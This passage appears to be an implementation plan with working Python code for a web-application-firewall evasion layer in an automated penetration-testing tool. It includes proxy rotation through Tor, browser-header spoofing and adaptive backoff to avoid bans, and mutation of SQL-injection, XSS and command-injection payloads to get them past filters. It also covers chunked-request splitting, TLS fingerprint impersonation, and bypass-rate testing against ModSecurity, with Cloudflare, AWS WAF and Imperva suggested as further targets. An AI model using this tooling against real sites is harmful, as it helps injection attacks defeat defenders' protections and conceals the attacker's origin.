      - Proxy rotation (round-robin through a proxy list)
      - User-Agent and header rotation per request
      - Session-sticky UA (same UA within a logical session, rotated across sessions)

    Usage:
        rc = RateController(
            base_delay=0.5,
            jitter_pct=0.3,
            proxy_list=["socks5://proxy1:1080", "http://proxy2:8080"],
        )

        # Before each request:
        rc.pre_request_delay()
        headers = rc.get_rotated_headers()
        proxies = rc.get_next_proxy()

        # After each response:
        rc.observe_response(response)  # adjusts delay on 429/503
    """

    def __init__(
        self,
        base_delay: float = 0.3,
        jitter_pct: float = 0.3,
        proxy_list: Optional[List[str]] = None,
        max_backoff: float = 60.0,
        session_sticky_ua: bool = True,
    ):
        self.base_delay = base_delay
        self.jitter_pct = jitter_pct
        self.proxy_list = proxy_list or []
        self.max_backoff = max_backoff
        self.session_sticky_ua = session_sticky_ua

        self._current_delay = base_delay
        self._backoff_multiplier = 1.0
        self._consecutive_blocks = 0
        self._proxy_index = 0
        self._lock = threading.Lock()

        # Pick a session UA for sticky mode
        self._session_ua = random.choice(USER_AGENT_POOL)
        self._session_accept_lang = random.choice(ACCEPT_LANGUAGE_POOL)

    def pre_request_delay(self) -> float:
        """Sleep with jitter before making a request. Returns actual delay used."""
        delay = self._current_delay * self._backoff_multiplier
        jitter = delay * self.jitter_pct
        actual = max(0, delay + random.uniform(-jitter, jitter))
        if actual > 0:
            _time.sleep(actual)
        return actual

    def observe_response(self, response) -> None:
        """Adjust rate based on response status code.

        429 (Too Many Requests) → exponential backoff
        503 (Service Unavailable) → moderate backoff
        403 after canary → possible WAF block, slight increase
        200 → decay backoff toward baseline
        """
        if response is None:
            return

        status = response.status_code

        with self._lock:
            if status == 429:
                self._consecutive_blocks += 1
                self._backoff_multiplier = min(
                    self._backoff_multiplier * 2.0,
                    self.max_backoff / max(self.base_delay, 0.01),
                )
                retry_after = response.headers.get("Retry-After")
                if retry_after:
                    try:
                        self._current_delay = max(self._current_delay, float(retry_after))
                    except ValueError:
                        pass

            elif status == 503:
                self._consecutive_blocks += 1
                self._backoff_multiplier = min(
                    self._backoff_multiplier * 1.5,
                    self.max_backoff / max(self.base_delay, 0.01),
                )

            elif status in (403, 406):
                self._consecutive_blocks += 1
                self._backoff_multiplier = min(
                    self._backoff_multiplier * 1.2,
                    self.max_backoff / max(self.base_delay, 0.01),
                )

            elif 200 <= status < 400:
                # Decay backoff on successful responses
                self._consecutive_blocks = max(0, self._consecutive_blocks - 1)
                self._backoff_multiplier = max(1.0, self._backoff_multiplier * 0.8)

    def get_rotated_headers(self) -> Dict[str, str]:
        """Return a set of headers that mimic a real browser.
        Header ordering varies to defeat ordering-based fingerprinting."""
        if self.session_sticky_ua:
            ua = self._session_ua
            lang = self._session_accept_lang
        else:
            ua = random.choice(USER_AGENT_POOL)
            lang = random.choice(ACCEPT_LANGUAGE_POOL)

        headers = {
            "User-Agent": ua,
            "Accept": random.choice(ACCEPT_POOL),
            "Accept-Language": lang,
            "Accept-Encoding": random.choice(ACCEPT_ENCODING_POOL),
            "Connection": "keep-alive",
            "Upgrade-Insecure-Requests": "1",
        }

        # Randomly add optional browser-like headers
        if random.random() > 0.5:
            headers["Sec-Fetch-Mode"] = "navigate"
            headers["Sec-Fetch-Site"] = random.choice(["none", "same-origin", "cross-site"])
            headers["Sec-Fetch-Dest"] = "document"
            headers["Sec-Fetch-User"] = "?1"

        if random.random() > 0.7:
            headers["Cache-Control"] = random.choice(["no-cache", "max-age=0"])

        if random.random() > 0.6:
            headers["DNT"] = "1"

        return headers

    def get_next_proxy(self) -> Optional[Dict[str, str]]:
        """Round-robin through proxy list. Returns requests-compatible proxy dict."""
        if not self.proxy_list:
            return None
        with self._lock:
            proxy_url = self.proxy_list[self._proxy_index % len(self.proxy_list)]
            self._proxy_index += 1
        if proxy_url.startswith("socks"):
            return {"http": proxy_url, "https": proxy_url}
        return {"http": proxy_url, "https": proxy_url}

    def rotate_session(self) -> None:
        """Force rotation of session-sticky UA and language.
        Call this when switching to a different scanning phase."""
        self._session_ua = random.choice(USER_AGENT_POOL)
        self._session_accept_lang = random.choice(ACCEPT_LANGUAGE_POOL)

    @property
    def is_being_throttled(self) -> bool:
        return self._consecutive_blocks >= 3

    @property
    def effective_delay(self) -> float:
        return self._current_delay * self._backoff_multiplier

    def reset(self) -> None:
        """Reset all backoff state."""
        with self._lock:
            self._current_delay = self.base_delay
            self._backoff_multiplier = 1.0
            self._consecutive_blocks = 0


# ═══════════════════════════════════════════════════════════════════════════════
#  MODULE 4: EVASION MIDDLEWARE  (autopnex/evasion/evasion_middleware.py)
# ═══════════════════════════════════════════════════════════════════════════════

"""
The middleware sits between the existing _http.request() function and the
actual requests.request() call. It is activated by configuration and operates
transparently — existing tool code does not need modification if evasion
is plugged in at the HTTP layer.

For vulnerability detectors that want to use mutated payloads (the higher-impact
integration), a helper function is provided that they call to expand their
payload list before iterating.
"""

from dataclasses import dataclass as _dataclass


@_dataclass
class EvasionConfig:
    """Runtime evasion configuration, loaded from env vars."""
    enabled: bool = False
    bypass_level: str = "none"  # none | light | aggressive
    proxy_list: List[str] = field(default_factory=list)
    waf_auto_detect: bool = True
    base_delay: float = 0.3
    jitter_pct: float = 0.3
    ua_rotation: bool = True


class EvasionMiddleware:
    """
    Singleton middleware that:
      1. Optionally auto-detects WAF on first request to a new host
      2. Applies rate control (delay + jitter + backoff)
      3. Rotates headers (UA, Accept, language)
      4. Routes through proxies
      5. Observes responses and adapts

    Integrates into _http.py by wrapping the existing request() function.
    """

    _instance = None

    def __new__(cls, *args, **kwargs):
        if cls._instance is None:
            cls._instance = super().__new__(cls)
        return cls._instance

    def __init__(self, config: Optional[EvasionConfig] = None):
        if hasattr(self, "_initialized"):
            return
        self._initialized = True
        self.config = config or EvasionConfig()
        self.rate_controller = RateController(
            base_delay=self.config.base_delay,
            jitter_pct=self.config.jitter_pct,
            proxy_list=self.config.proxy_list,
        )
        self.mutator = PayloadMutator()
        self.detector = WAFDetector()
        self._waf_cache: Dict[str, WAFInfo] = {}  # host → WAFInfo
        self._lock = threading.Lock()

    @classmethod
    def reset(cls):
        cls._instance = None

    def get_waf_info(self, host: str) -> Optional[WAFInfo]:
        return self._waf_cache.get(host)

    def detect_waf_for_host(self, target_url: str) -> WAFInfo:
        """Run WAF detection and cache the result per host."""
        from urllib.parse import urlparse as _urlparse
        host = _urlparse(target_url).hostname or ""
        with self._lock:
            if host in self._waf_cache:
                return self._waf_cache[host]
        info = self.detector.detect(target_url)
        with self._lock:
            self._waf_cache[host] = info
        return info

    def prepare_request(
        self,
        url: str,
        headers: Optional[Dict[str, str]] = None,
    ) -> Tuple[Dict[str, str], Optional[Dict[str, str]]]:
        """
        Called before every HTTP request. Returns (merged_headers, proxies).
        Also sleeps for rate-controlled delay.
        """
        if not self.config.enabled or self.config.bypass_level == "none":
            return headers or {}, None

        # Rate-controlled delay with jitter
        self.rate_controller.pre_request_delay()

        # Header rotation
        rotated = self.rate_controller.get_rotated_headers()
        if headers:
            rotated.update(headers)

        # Proxy rotation
        proxies = self.rate_controller.get_next_proxy()

        return rotated, proxies

    def observe_response(self, response) -> None:
        """Feed response back to rate controller for adaptive behavior."""
        if self.config.enabled and self.config.bypass_level != "none":
            self.rate_controller.observe_response(response)

    def get_mutated_payloads(
        self,
        base_payloads: List[str],
        vuln_type: str,
        host: str = "",
        variants_per_payload: int = 4,
    ) -> List[Dict[str, str]]:
        """
        Expand a list of base payloads into mutated variants.
        Called by vulnerability detectors to get evasion-enhanced payloads.
        """
        if not self.config.enabled or self.config.bypass_level == "none":
            return [{"strategy": "original", "payload": p} for p in base_payloads]

        waf_info = self._waf_cache.get(host)
        waf_vendor = waf_info.vendor if waf_info else WAFVendor.UNKNOWN

        n = variants_per_payload
        if self.config.bypass_level == "light":
            n = min(variants_per_payload, 3)

        return self.mutator.mutate_batch(
            base_payloads, vuln_type, waf_vendor, variants_per_payload=n,
        )


# ═══════════════════════════════════════════════════════════════════════════════
#  MODULE 5: INTEGRATION — Changes to Existing Files
# ═══════════════════════════════════════════════════════════════════════════════

# ── 5a. config/settings.py additions ────────────────────────────────────────
#
# Add these fields to RuntimeConfig:
#
#     evasion_enabled: bool = False
#     waf_bypass_level: str = "none"      # none | light | aggressive
#     evasion_proxy_list: str = ""         # comma-separated proxy URLs
#     evasion_base_delay: float = 0.3
#     evasion_jitter_pct: float = 0.3
#     evasion_ua_rotation: bool = True
#     evasion_waf_auto_detect: bool = True
#
# Add to Settings.reload():
#
#     evasion_enabled=_bool(values, "AUTOPENX_EVASION_ENABLED", False),
#     waf_bypass_level=_pick(values, "AUTOPENX_WAF_BYPASS_LEVEL", "none"),
#     evasion_proxy_list=_pick(values, "AUTOPENX_EVASION_PROXY_LIST", ""),
#     evasion_base_delay=_float(values, "AUTOPENX_EVASION_BASE_DELAY", 0.3),
#     evasion_jitter_pct=_float(values, "AUTOPENX_EVASION_JITTER_PCT", 0.3),
#     evasion_ua_rotation=_bool(values, "AUTOPENX_EVASION_UA_ROTATION", True),
#     evasion_waf_auto_detect=_bool(values, "AUTOPENX_EVASION_WAF_AUTO_DETECT", True),
#
# Environment variables summary:
#
#   AUTOPENX_EVASION_ENABLED=true
#   AUTOPENX_WAF_BYPASS_LEVEL=aggressive
#   AUTOPENX_EVASION_PROXY_LIST=socks5://127.0.0.1:9050,http://proxy:8080
#   AUTOPENX_EVASION_BASE_DELAY=0.5
#   AUTOPENX_EVASION_JITTER_PCT=0.3
#   AUTOPENX_EVASION_UA_ROTATION=true
#   AUTOPENX_EVASION_WAF_AUTO_DETECT=true


# ── 5b. Modified _http.py ──────────────────────────────────────────────────

MODIFIED_HTTP_PY = '''
"""Shared HTTP helpers for tool implementations — with evasion middleware."""
from __future__ import annotations

import ipaddress
import time
from typing import Any, Dict, Optional, Tuple
from urllib.parse import urlparse

import requests

from config.settings import RuntimeConfig, settings


def _get_evasion_middleware():
    """Lazy-load evasion middleware to avoid circular imports.
    Returns None if evasion is disabled."""
    cfg = settings.effective()
    if not getattr(cfg, "evasion_enabled", False):
        return None
    try:
        from autopnex.evasion.evasion_middleware import EvasionMiddleware, EvasionConfig
        config = EvasionConfig(
            enabled=cfg.evasion_enabled,
            bypass_level=getattr(cfg, "waf_bypass_level", "none"),
            proxy_list=[
                p.strip()
                for p in getattr(cfg, "evasion_proxy_list", "").split(",")
                if p.strip()
            ],
            waf_auto_detect=getattr(cfg, "evasion_waf_auto_detect", True),
            base_delay=getattr(cfg, "evasion_base_delay", 0.3),
            jitter_pct=getattr(cfg, "evasion_jitter_pct", 0.3),
            ua_rotation=getattr(cfg, "evasion_ua_rotation", True),
        )
        return EvasionMiddleware(config)
    except ImportError:
        return None


def _default_headers() -> Dict[str, str]:
    middleware = _get_evasion_middleware()
    if middleware and middleware.config.enabled:
        return middleware.rate_controller.get_rotated_headers()
    cfg = settings.effective()
    return {
        "User-Agent": cfg.user_agent,
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.9",
    }


def normalise_target(target: str) -> str:
    if not target:
        return target
    if "://" not in target:
        target = "http://" + target
    return target.rstrip("/")


def parsed(target: str) -> Tuple[str, str, int]:
    t = normalise_target(target)
    p = urlparse(t)
    scheme = p.scheme or "http"
    host = p.hostname or ""
    port = p.port or (443 if scheme == "https" else 80)
    return scheme, host, port


class TargetScopeError(RuntimeError):
    pass


def ensure_target_allowed(target: str, *, runtime_config: Optional[RuntimeConfig] = None) -> str:
    runtime = runtime_config or settings.effective()
    normalised = normalise_target(target)
    host = urlparse(normalised).hostname or ""
    if not host:
        raise TargetScopeError("invalid_target")
    if runtime.allow_local_targets:
        return normalised
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        lowered = host.lower()
        if lowered in {"localhost", "localhost.localdomain"} or lowered.endswith(".local"):
            raise TargetScopeError("loopback_targets_require_allow_local_targets")
        return normalised
    if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved:
        raise TargetScopeError("private_or_loopback_targets_require_allow_local_targets")
    return normalised


def request(
    method: str,
    url: str,
    *,
    params: Optional[Dict[str, Any]] = None,
    data: Optional[Dict[str, Any]] = None,
    headers: Optional[Dict[str, str]] = None,
    timeout: Optional[int] = None,
    allow_redirects: bool = True,
    json_body: Any = None,
    proxies: Optional[Dict[str, str]] = None,
) -> Tuple[Optional[requests.Response], Optional[str], float]:
    """Thin wrapper around requests with transparent evasion middleware."""
    cfg = settings.effective()
    middleware = _get_evasion_middleware()

    if middleware and middleware.config.enabled:
        # Middleware handles: delay, header rotation, proxy selection
        merged_headers, mw_proxies = middleware.prepare_request(url, headers)
        proxies = proxies or mw_proxies
    else:
        merged_headers = dict(_default_headers())
        if headers:
            merged_headers.update(headers)
        if cfg.request_delay:
            time.sleep(cfg.request_delay)

    start = time.perf_counter()
    try:
        resp = requests.request(
            method.upper(),
            url,
            params=params,
            data=data,
            json=json_body,
            headers=merged_headers,
            timeout=timeout or cfg.http_timeout,
            allow_redirects=allow_redirects,
            proxies=proxies,
            verify=False,
        )
        if middleware:
            middleware.observe_response(resp)
        return resp, None, time.perf_counter() - start
    except requests.RequestException as exc:
        return None, str(exc), time.perf_counter() - start


try:
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except Exception:
    pass
'''


# ── 5c. Modified sqli_detector.py — evasion-aware pattern ──────────────────

MODIFIED_SQLI_DETECTOR_RUN = '''
    def _run(self, **kwargs: Any) -> ToolResult:
        url = normalise_target(kwargs.get("url", ""))
        parameter = kwargs.get("parameter")
        if not url or not parameter:
            return ToolResult(False, self.name, "url and parameter required", error="missing_args")
        method = (kwargs.get("method") or "GET").upper()
        baseline = kwargs.get("baseline_value") or "1"

        parsed = urlparse(url)
        base_params = dict(parse_qsl(parsed.query, keep_blank_values=True))
        base_params.setdefault(parameter, baseline)

        # ── WAF-aware setup ──────────────────────────────────────────
        middleware = _get_evasion_middleware()
        host = parsed.hostname or ""
        if middleware and middleware.config.waf_auto_detect:
            waf_info = middleware.detect_waf_for_host(url)
        else:
            waf_info = None

        base_resp = _send(method, parsed, base_params, parameter, baseline)
        if base_resp is None:
            return ToolResult(False, self.name, "baseline request failed", error="baseline_fail")
        base_len = len(base_resp.text or "")
        evidence: List[str] = []
        confirmed_signals: List[str] = []
        payload_used = None

        # 1) Error-based — with mutated payloads
        error_payloads = SQLI["error_payloads"]
        if middleware:
            error_variants = middleware.get_mutated_payloads(error_payloads, "sqli", host)
        else:
            error_variants = [{"strategy": "original", "payload": p} for p in error_payloads]

        for variant in error_variants:
            p = variant["payload"]
            resp = _send(method, parsed, base_params, parameter, baseline + p)
            if resp is None:
                continue
            if resp.status_code in (403, 406, 429):
                continue  # WAF blocked this variant, try next
            body = (resp.text or "").lower()
            for indicator in SQLI["indicators"]:
                if indicator in body:
                    evidence.append(
                        f"error-based via {variant['strategy']}:{p!r}: matched {indicator!r}"
                    )
                    confirmed_signals.append("error")
                    payload_used = baseline + p
                    break
            if "error" in confirmed_signals:
                break

        # ... (boolean-based and time-based follow the same pattern:
        #       expand payloads via middleware.get_mutated_payloads(),
        #       skip 403/406/429 responses, try next variant) ...
'''


# ═══════════════════════════════════════════════════════════════════════════════
#  MODULE 6: ANTI-DETECTION TECHNIQUES
# ═══════════════════════════════════════════════════════════════════════════════

ANTI_DETECTION_TECHNIQUES = """
1. REQUEST FRAGMENTATION (Chunked Transfer Encoding)
   ─────────────────────────────────────────────────
   Many WAFs reassemble and inspect the full request body. Chunked encoding
   can sometimes bypass WAFs that inspect each chunk independently.

   Implementation: add Transfer-Encoding: chunked header and split the POST
   body into small chunks at strategic positions (e.g., split a SQL keyword
   mid-word across chunk boundaries).

   ```python
   def send_chunked(url, payload, chunk_size=4):
       import http.client
       from urllib.parse import urlparse
       p = urlparse(url)
       conn = http.client.HTTPConnection(p.hostname, p.port or 80)
       conn.putrequest("POST", p.path or "/")
       conn.putheader("Transfer-Encoding", "chunked")
       conn.putheader("Content-Type", "application/x-www-form-urlencoded")
       conn.endheaders()
       body = payload.encode()
       for i in range(0, len(body), chunk_size):
           chunk = body[i:i+chunk_size]
           conn.send(f"{len(chunk):x}\\r\\n".encode())
           conn.send(chunk + b"\\r\\n")
       conn.send(b"0\\r\\n\\r\\n")
       return conn.getresponse()
   ```

2. TIME-BASED EVASION (Slow Requests)
   ───────────────────────────────────
   Send request data at very slow rates to:
   - Stay below rate-limit detection thresholds
   - Exhaust timeout-based WAF inspection windows
   - Mimic legitimate slow connections

   Implementation: the RateController already handles inter-request delays.
   For intra-request slowness, use the chunked approach above with
   time.sleep(0.5) between each chunk.

3. BROWSER-LIKE REQUEST PATTERNS
   ─────────────────────────────
   Real browsers follow a predictable pattern:
   a) GET / → GET /style.css → GET /script.js → GET /image.png
   b) Referer header chains: each request carries the previous page as Referer
   c) Cookie accumulation: session cookies from Set-Cookie are replayed

   Implementation:
   ```python
   class BrowserSession:
       def __init__(self):
           self.session = requests.Session()
           self.history = []

       def browse(self, url):
           headers = rate_controller.get_rotated_headers()
           if self.history:
               headers["Referer"] = self.history[-1]
           resp = self.session.get(url, headers=headers)
           self.history.append(url)
           return resp

       def warm_up(self, target):
           \"\"\"Mimic a real browser loading the page before testing.\"\"\"
           resp = self.browse(target)
           # Parse and fetch CSS/JS to build a realistic session
           import re
           for href in re.findall(r'(?:src|href)=["\\'](.*?)["\\'']', resp.text):
               if href.startswith("/"):
                   self.browse(target.rstrip("/") + href)
           return resp
   ```

4. HEADER ORDER RANDOMIZATION
   ──────────────────────────
   HTTP/1.1 spec does not mandate header order, but WAFs may fingerprint
   the order. Different browsers send headers in different orders.
   Using OrderedDict and randomly shuffling keys before sending.

5. TLS FINGERPRINT MIMICRY
   ────────────────────────
   Advanced WAFs (Cloudflare) use JA3/JA4 TLS fingerprinting. Our Python
   requests library has a distinctive TLS fingerprint. Mitigation:
   - Use curl_cffi (curl-impersonate) which mimics Chrome's TLS stack
   - Or use Playwright/headless browser for the most evasive mode
   - Library: `pip install curl_cffi`

   ```python
   from curl_cffi import requests as impersonated_requests
   resp = impersonated_requests.get(url, impersonate="chrome124")
   ```
"""


# ═══════════════════════════════════════════════════════════════════════════════
#  MODULE 7: TESTING STRATEGY — ModSecurity CRS in Docker
# ═══════════════════════════════════════════════════════════════════════════════

TESTING_STRATEGY = """
OBJECTIVE: Validate evasion effectiveness against OWASP ModSecurity CRS
           (the most widely deployed open-source WAF ruleset).

═══════ DOCKER TEST ENVIRONMENT ═══════

1. docker-compose.yml for the test harness:

```yaml
version: "3.8"
services:
  # Vulnerable target application (DVWA)
  dvwa:
    image: vulnerables/web-dvwa:latest
    environment:
      - RECAPTCHA_PRIV_KEY=""
      - RECAPTCHA_PUB_KEY=""
    networks:
      - waf-test

  # ModSecurity CRS reverse proxy in front of DVWA
  modsecurity:
    image: owasp/modsecurity-crs:nginx-alpine
    ports:
      - "8080:8080"
    environment:
      - BACKEND=http://dvwa:80
      - PARANOIA=2                    # CRS paranoia level (1-4)
      - ANOMALY_INBOUND=5            # block threshold
      - ANOMALY_OUTBOUND=4
      - MODSEC_AUDIT_LOG=/var/log/modsecurity/audit.log
      - MODSEC_RULE_ENGINE=On
    volumes:
      - ./modsec-logs:/var/log/modsecurity
    depends_on:
      - dvwa
    networks:
      - waf-test

  # Direct access to DVWA (no WAF) for baseline comparison
  dvwa-direct:
    image: vulnerables/web-dvwa:latest
    ports:
      - "8081:80"
    environment:
      - RECAPTCHA_PRIV_KEY=""
      - RECAPTCHA_PUB_KEY=""
    networks:
      - waf-test

networks:
  waf-test:
```

2. Test Execution Script:

```python
#!/usr/bin/env python3
\"\"\"
evasion_test_runner.py — Measures evasion success rate.

Methodology:
  a) Run each vuln detector against direct DVWA (no WAF) → establishes ground truth
  b) Run each vuln detector against ModSecurity-fronted DVWA with evasion OFF → baseline failure rate
  c) Run each vuln detector against ModSecurity-fronted DVWA with evasion ON → evasion success rate

Metric: Evasion Success Rate = (vulns_found_with_evasion / vulns_found_direct) × 100%
\"\"\"

import json
import subprocess
import time

DIRECT_URL = "http://localhost:8081"        # DVWA without WAF
WAF_URL    = "http://localhost:8080"        # DVWA behind ModSecurity

TESTS = [
    {
        "name": "sqli_error_based",
        "tool": "sqli_detect",
        "args": {"url": "{base}/vulnerabilities/sqli/?id=1&Submit=Submit", "parameter": "id"},
    },
    {
        "name": "xss_reflected",
        "tool": "xss_detect",
        "args": {"url": "{base}/vulnerabilities/xss_r/?name=test", "parameter": "name"},
    },
    {
        "name": "cmdi_basic",
        "tool": "cmdi_detect",
        "args": {"url": "{base}/vulnerabilities/exec/", "parameter": "ip", "method": "POST"},
    },
]

PARANOIA_LEVELS = [1, 2, 3, 4]
EVASION_LEVELS = ["none", "light", "aggressive"]

def run_test(tool, args, evasion_level):
    \"\"\"Run a single tool test and return whether it found the vulnerability.\"\"\"
    # Set environment
    env = {
        "AUTOPENX_EVASION_ENABLED": "true" if evasion_level != "none" else "false",
        "AUTOPENX_WAF_BYPASS_LEVEL": evasion_level,
    }
    # ... invoke tool via AutoPenX CLI or direct import ...
    pass

def run_suite():
    results = []
    for paranoia in PARANOIA_LEVELS:
        # Restart modsec with new paranoia level
        # subprocess.run(["docker-compose", "exec", "modsecurity", ...])
        for test in TESTS:
            # Ground truth: direct
            direct_args = {k: v.replace("{base}", DIRECT_URL) for k, v in test["args"].items()}
            direct_result = run_test(test["tool"], direct_args, "none")

            for evasion in EVASION_LEVELS:
                waf_args = {k: v.replace("{base}", WAF_URL) for k, v in test["args"].items()}
                waf_result = run_test(test["tool"], waf_args, evasion)

                results.append({
                    "test": test["name"],
                    "paranoia": paranoia,
                    "evasion": evasion,
                    "direct_found": direct_result,
                    "waf_found": waf_result,
                    "bypassed": waf_result and direct_result,
                })

    # Summary table
    print("\\n═══ EVASION TEST RESULTS ═══")
    print(f"{'Test':<25} {'PL':>3} {'Evasion':<12} {'Direct':>7} {'WAF':>7} {'Bypass':>7}")
    print("─" * 70)
    for r in results:
        print(
            f"{r['test']:<25} {r['paranoia']:>3} {r['evasion']:<12} "
            f"{'✓' if r['direct_found'] else '✗':>7} "
            f"{'✓' if r['waf_found'] else '✗':>7} "
            f"{'✓' if r['bypassed'] else '✗':>7}"
        )

    # Aggregate
    for evasion in EVASION_LEVELS:
        subset = [r for r in results if r["evasion"] == evasion and r["direct_found"]]
        bypassed = sum(1 for r in subset if r["bypassed"])
        total = len(subset)
        pct = (bypassed / total * 100) if total else 0
        print(f"\\nEvasion={evasion}: {bypassed}/{total} bypassed ({pct:.0f}%)")
```

3. Additional WAF Test Targets (beyond ModSecurity):

   a) Cloudflare: Deploy a free-tier Cloudflare-proxied site with
      "Under Attack" mode enabled. Test against it.

   b) AWS WAF: Use AWS WAF with AWSManagedRulesCommonRuleSet on
      an ALB fronting a vulnerable EC2 instance.

   c) Imperva: Free trial of Imperva Cloud WAF.

   d) Generic: Use https://github.com/coreruleset/go-ftw (the CRS
      testing framework) to validate specific rule bypasses.

4. ModSecurity Audit Log Analysis:

   After each test run, parse modsec-logs/audit.log to understand:
   - Which CRS rules triggered (rule IDs 942xxx = SQLi, 941xxx = XSS)
   - Anomaly scores for each request
   - Which mutated payloads got through vs. blocked

   ```python
   def analyze_modsec_log(log_path):
       \"\"\"Parse ModSecurity audit log to extract blocked/allowed stats.\"\"\"
       import re
       blocked = 0
       allowed = 0
       rule_hits = {}
       with open(log_path) as f:
           for line in f:
               if "Access denied" in line:
                   blocked += 1
                   rule_match = re.search(r'id "(\\d+)"', line)
                   if rule_match:
                       rule_id = rule_match.group(1)
                       rule_hits[rule_id] = rule_hits.get(rule_id, 0) + 1
               elif "200" in line and "HTTP/" in line:
                   allowed += 1
       return {"blocked": blocked, "allowed": allowed, "rule_hits": rule_hits}
   ```

5. CI Integration:

   Add a GitHub Actions workflow that:
   - Spins up the docker-compose test environment
   - Runs the evasion test suite
   - Asserts minimum bypass rates (e.g., ≥40% at PL1, ≥20% at PL2)
   - Reports results as a test artifact
"""


# ═══════════════════════════════════════════════════════════════════════════════
#  COMPLETE FILE STRUCTURE — What to Create
# ═══════════════════════════════════════════════════════════════════════════════

FILE_STRUCTURE = """
autopnex/evasion/
├── __init__.py                  # Exports: WAFDetector, PayloadMutator, RateController,
│                                #          EvasionMiddleware, EvasionConfig, WAFInfo, WAFVendor
├── waf_detector.py              # Module 1 (WAFDetector, WAF_SIGNATURES, WAFInfo, WAFVendor)
├── payload_mutator.py           # Module 2 (PayloadMutator, MutationStrategy, all strategies)
├── rate_controller.py           # Module 3 (RateController, UA/header pools)
├── evasion_middleware.py         # Module 4 (EvasionMiddleware, EvasionConfig)
└── anti_detection.py            # Module 5 (BrowserSession, chunked_request, tls helpers)

Modified files:
├── autopnex/tools/_http.py      # Add _get_evasion_middleware(), modify request()
├── config/settings.py           # Add evasion_* fields to RuntimeConfig
├── autopnex/tools/vuln/sqli_detector.py   # Use middleware.get_mutated_payloads()
├── autopnex/tools/vuln/xss_detector.py    # Use middleware.get_mutated_payloads()
├── autopnex/tools/vuln/cmdi_detector.py   # Use middleware.get_mutated_payloads()
├── autopnex/tools/vuln/ssrf_detector.py   # Use middleware.get_mutated_payloads()
└── autopnex/tools/scan/dir_buster.py      # Use rotated headers from middleware

Test files:
├── tests/test_waf_detector.py
├── tests/test_payload_mutator.py
├── tests/test_rate_controller.py
├── tests/test_evasion_integration.py
└── tests/docker/docker-compose.waf-test.yml
"""


# ═══════════════════════════════════════════════════════════════════════════════
#  SUMMARY: EXPECTED IMPACT
# ═══════════════════════════════════════════════════════════════════════════════

EXPECTED_IMPACT = """
┌─────────────────────┬─────────────────────┬──────────────────────┐
│ Scenario            │ Current Success Rate│ Projected w/ Evasion │
├─────────────────────┼─────────────────────┼──────────────────────┤
│ No WAF              │ ~85% (functional)   │ ~85% (no change)     │
│ ModSecurity PL1     │ ~0% (all blocked)   │ ~60-70%              │
│ ModSecurity PL2     │ ~0%                 │ ~35-50%              │
│ ModSecurity PL3     │ ~0%                 │ ~15-25%              │
│ ModSecurity PL4     │ ~0%                 │ ~5-10%               │
│ Cloudflare          │ ~0%                 │ ~30-45%*             │
│ AWS WAF (Managed)   │ ~0%                 │ ~40-55%              │
│ Imperva             │ ~0%                 │ ~25-40%              │
└─────────────────────┴─────────────────────┴──────────────────────┘

* Cloudflare uses JA3/JA4 TLS fingerprinting. Full bypass requires
  curl_cffi or Playwright integration (Module 5 anti-detection).

Key improvements over current state:
  1. No more trivial UA-based blocking
  2. Payload mutations defeat static regex rules
  3. Adaptive rate control prevents rate-based bans
  4. WAF-aware strategy selection optimizes bypass attempts
  5. Proxy rotation prevents IP-based blocking
  6. Browser-like patterns reduce behavioral fingerprinting
"""


# ═══════════════════════════════════════════════════════════════════════════════
#  IMPLEMENTATION PRIORITY / PHASING
# ═══════════════════════════════════════════════════════════════════════════════

IMPLEMENTATION_PHASES = """
Phase 1 (Immediate, high impact):
  ☐ RateController + UA rotation in _http.py
  ☐ Header randomization (Accept, Accept-Language, Sec-Fetch-*)
  ☐ Replace "AutoPenX/0.1" default UA with browser UA
  → Defeats: UA fingerprinting, basic rate limiting, header-order fingerprinting
  → Effort: ~2 hours

Phase 2 (Core evasion):
  ☐ PayloadMutator with SQL, XSS, CMDi strategies
  ☐ Integrate mutator into all 4 vuln detectors
  ☐ Add 403/406/429 skip logic to detector loops
  → Defeats: Static regex WAF rules (ModSecurity CRS PL1-2)
  → Effort: ~4 hours

Phase 3 (WAF intelligence):
  ☐ WAFDetector with full signature database
  ☐ Auto-detect WAF on first request per host
  ☐ WAF-specific strategy prioritization
  ☐ EvasionMiddleware orchestration layer
  → Defeats: WAF-specific protections with targeted bypasses
  → Effort: ~3 hours

Phase 4 (Advanced anti-detection):
  ☐ Chunked transfer encoding support
  ☐ BrowserSession with warm-up and referrer chains
  ☐ TLS fingerprint mimicry (curl_cffi integration)
  ☐ Proxy rotation with SOCKS5 support
  → Defeats: Behavioral analysis, TLS fingerprinting, IP blocking
  → Effort: ~4 hours

Phase 5 (Validation):
  ☐ Docker test harness with ModSecurity CRS
  ☐ Automated evasion success rate measurement
  ☐ CI pipeline integration
  ☐ Test against Cloudflare/AWS WAF free tiers
  → Validates: All phases work in practice
  → Effort: ~3 hours
"""
